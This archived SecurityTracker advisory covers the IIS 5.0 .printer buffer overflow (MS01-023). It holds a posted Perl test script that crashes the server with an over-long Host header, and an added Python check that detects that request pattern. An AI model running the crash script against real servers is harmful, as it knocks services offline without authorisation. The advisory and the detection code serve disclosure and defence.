(A User Provides A Simple Test Script) Re: Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server
SecurityTracker Alert ID: 1001474
SecurityTracker URL: http://securitytracker.com/id/1001474
CVE Reference:
GENERIC-MAP-NOMATCH
Date: May 3 2001
Impact:
Execution of arbitrary code via network, Root access via network
Exploit Included: Yes
Version(s): Microsoft Windows 2000 Internet Information Services 5.0, Microsoft Windows 2000 Internet Information Services 5.0 + Service Pack 1
Description:
eEye Digital Security reported a vulnerability in the Windows 2000 version of Internet Information Server 5.0. The security hole lets remote users execute arbitrary code on the server in the "system" context, which could allow the remote user to obtain system level access on the server.
A user has supplied a simple vulnerability test script. See the Source Message for the code.
Impact:
A remote user could cause the IIS web server to execute arbitrary code in the "system" context, which could allow the remote user to obtain system level access on the server (i.e., take complete control of the server).
Solution:
The vendor has released a fix and strongly recommends that all customers with affected servers apply the patch. See the Vendor URL for patch information.
Vendor URL: www.microsoft.com/technet/security/bulletin/ms01-023.asp
Cause:
Boundary error
Underlying OS:
Windows (2000)
Message History:
This archive entry is a follow-up to the message listed below.
Source Message Contents
Date: Wed, 2 May 2001 12:55:34 -0300
Subject: Re: Windows 2000 IIS 5.0 Remote buffer overflow vulnerability
Hi Everyone,
I've coded a very simple vulnerability test that actually causes the memory leak, but I still don't have the shellcode to overwrite the EIP register.
Cheers,
Wanderley
Attachment: webexplt.pl
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with success against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol
# This code was written after eEye brought this issue in BugTraq.
use Socket;

print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";

if (not $ARGV[0]) {
    print qq~
Usage: webexplt.pl <host>
~;
    exit;
}

$ip = $ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";

# Request the .printer ISAPI extension with an over-long Host header.
my @results = sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: " .
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");

print "Results:\n";
# An empty reply is taken to mean the server fell over.
if (not @results) {
    print "The Machine tested has the IPP Vulnerability!";
}
print @results;

sub sendexplt {
    my ($pstr) = @_;
    $target = inet_aton($ip) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
        die("Socket problems\n");
    # pack "SnA4x8" builds a sockaddr_in by hand: family 2 (AF_INET), port 80, address.
    if (connect(S, pack "SnA4x8", 2, 80, $target)) {
        select(S);
        $| = 1;            # unbuffered writes to the socket
        print $pstr;
        my @in = <S>;      # read the reply, if any
        select(STDOUT);
        close(S);
        return @in;
    } else { die("Can't connect...\n"); }
}
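Added example (not part of the archived message, eEye's advisory or Microsoft's material): a small Python check, run over constructed sample requests, that flags the pattern the posted test script sends, namely a request for a ".printer" resource carrying a Host header hundreds of bytes long. The 420-byte threshold and the sample requests are assumptions chosen for illustration. The vendor patch in the Solution section is the fix; a check like this only helps spot attempts in captured traffic or request logs.

```python
"""Detection check for the IIS 5.0 .printer (MS01-023) request pattern.

Added example for this archive page; it is not part of the original
message, eEye's advisory or Microsoft's tooling. It looks at the two
features visible in the posted test script: a request for a ".printer"
resource and a Host header that is hundreds of bytes long. The 420-byte
threshold is an assumption for illustration; legitimate Host headers carry
a hostname and optional port and are far shorter. All sample requests are
constructed.
"""
import re

# Assumption: Host values longer than this are treated as an overflow attempt.
HOST_LEN_THRESHOLD = 420

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")


def parse_request(raw):
    """Parse the head of a raw HTTP/1.x request.

    Accepts CRLF or bare LF line endings (the posted script uses "\\n").
    Returns (method, path, headers) with lower-cased header names, or
    None when the request line does not parse.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # ignore folded continuations and junk lines
            headers[name.strip().lower()] = value.strip()
    return m.group("method"), m.group("path"), headers


def check_request(raw):
    """Classify one request; returns (suspicious, reason)."""
    parsed = parse_request(raw)
    if parsed is None:
        return False, "unparseable request line"
    _method, path, headers = parsed
    host = headers.get("host", "")
    is_printer = path.split("?", 1)[0].lower().endswith(".printer")
    if len(host) > HOST_LEN_THRESHOLD:
        if is_printer:
            return True, f".printer request with {len(host)}-byte Host header (MS01-023 pattern)"
        return True, f"over-long Host header ({len(host)} bytes)"
    return False, "ok"


def scan(requests):
    """Run check_request over an iterable of raw requests; return (index, reason) for flagged ones."""
    return [(i, reason) for i, raw in enumerate(requests)
            for flagged, reason in [check_request(raw)] if flagged]


# Constructed sample traffic. Request 1 mirrors the shape of the posted
# test script (bare "\n" endings, 430 "A"s in Host); the others are benign,
# a legitimate IPP request, a near miss on another path, and junk.
SAMPLE_REQUESTS = [
    "GET /index.htm HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    "GET /NULL.printer HTTP/1.0\nHost: " + "A" * 430 + "\n\n",
    "GET /printers/lp1.printer HTTP/1.1\r\nHost: print.example.com:80\r\n\r\n",
    "POST /submit.asp HTTP/1.1\r\nHost: " + "B" * 500 + "\r\nContent-Length: 0\r\n\r\n",
    "garbage that is not http",
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: {reason}")
```

The check keys on the header length rather than on the exact byte count from the script, so an attempt padded differently is still flagged, while a normal request for a ".printer" resource with a sane Host header passes.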